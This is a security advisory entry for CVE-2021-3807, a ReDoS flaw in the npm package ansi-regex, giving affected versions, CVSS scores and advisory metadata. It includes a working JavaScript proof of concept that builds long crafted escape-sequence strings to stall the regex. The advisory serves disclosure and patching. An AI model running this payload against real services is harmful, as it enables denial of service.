CVE-2021-3807 – ansi-regex

Package

Manager: npm
Name: ansi-regex
Vulnerable Version: >=6.0.0 <6.0.1 || >=5.0.0 <5.0.1 || >=4.0.0 <4.1.1 || >=3.0.0 <3.0.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00215 pctl0.44093

Details

Inefficient Regular Expression Complexity in chalk/ansi-regex ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes. **Proof of Concept** ```js import ansiRegex from 'ansi-regex'; for(var i = 1; i <= 50000; i++) { var time = Date.now(); var attack_str = "\u001B["+";".repeat(i*10000); ansiRegex().test(attack_str) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") } ``` The ReDOS is mainly due to the sub-patterns `[[\\]()#;?]*` and `(?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*`

Metadata

Created: 2021-09-20T20:20:09Z
Modified: 2023-09-11T16:42:11Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-93q8-gq69-wqmw/GHSA-93q8-gq69-wqmw.json
CWE IDs: ["CWE-1333", "CWE-697"]
Alternative ID: GHSA-93q8-gq69-wqmw
Finding: F211
Auto approve: 1